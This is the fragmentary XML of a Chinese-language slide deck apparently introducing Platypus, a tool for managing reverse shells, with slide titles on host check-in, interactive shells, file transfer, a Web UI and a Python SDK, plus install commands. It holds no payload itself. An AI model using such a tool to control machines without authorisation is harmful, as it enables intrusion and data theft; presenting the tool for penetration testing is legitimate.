              <a:t>一样使用反弹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFE955"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell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吗？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ED268-3B37-40F8-BFA7-10CA3ED3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3" y="1977526"/>
            <a:ext cx="10787394" cy="46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FAAA6-4BD3-4CC8-AEF8-7CF4B7FB5D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其他小特性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B086-000A-4D87-ADEC-FB550A3E09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2375" y="1490662"/>
            <a:ext cx="10969625" cy="475932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文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下载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Web UI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多会话管理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RESTful API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Python SDK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…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3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D05D4-3784-4EF1-80BC-C62455614A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55C581-FCFC-475A-A70E-638A673AA8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3958" y="1648109"/>
            <a:ext cx="10969625" cy="475932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方法一：通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>go get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go get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WangYihang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Platypus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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方法二：通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GitHub Release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https://github.com/WangYihang/Platypus/releases/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方法三：获取代码手动编译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git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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https://github.com/WangYihang/Platypus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cd Platypus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go run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>platypus.go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5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运行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AA89F3-5D0B-45BB-8D6F-56A9521A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1505344"/>
            <a:ext cx="11461750" cy="64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7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E108-FDA8-4237-BF9A-E9F36FCE67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10969625" cy="7064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交互方式（一）：命令行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机上线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1C4BF4-F51E-4EF4-B499-F532E17521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32" y="1585713"/>
            <a:ext cx="8867336" cy="4968392"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24250662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606</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>101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Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Cascadia Code</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>简介 - Platypus</vt:lpstr>
      <vt:lpstr>功能（一）：Reverse Shell as a Service</vt:lpstr>
      <vt:lpstr>特性（一）：Reverse Shell as a Service</vt:lpstr>
      <vt:lpstr>特性（二）：交互式 Shell</vt:lpstr>
      <vt:lpstr>其他小特性</vt:lpstr>
      <vt:lpstr>安装</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 运行</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 主机上线</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 选择主机</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 获取裸 Shell （如：Windows）</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 交互式 Shell</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 文件上传</vt:lpstr>
      <vt:lpstr>交互方式（一）：命令行 – 文件下载</vt:lpstr>
      <vt:lpstr>交互方式（二）：Web UI – 运行</vt:lpstr>
      <vt:lpstr>交互方式（二）：Web UI – 添加监听端口</vt:lpstr>
      <vt:lpstr>交互方式（二）：Web UI – 主机上线</vt:lpstr>
      <vt:lpstr>交互方式（二）：Web UI – 交互式 Shell</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK – 安装</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK – 连接后端</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK –新建服务器</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK – 列服务器</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK – 列主机</vt:lpstr>
      <vt:lpstr>交互方式（三）：Python SDK – 下发命令</vt:lpstr>
      <vt:lpstr>开发计划 &amp; We need your help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jr</dc:creator>
  <cp:lastModifiedBy>Polaris</cp:lastModifiedBy>
  <cp:revision>281</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-15T09:48:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-01T04:13:36Z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2052-3.5.0.5458</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>B28E94D450184F399837D57C56E0D202</vt:lpwstr>
  </property>
</Properties>
</file>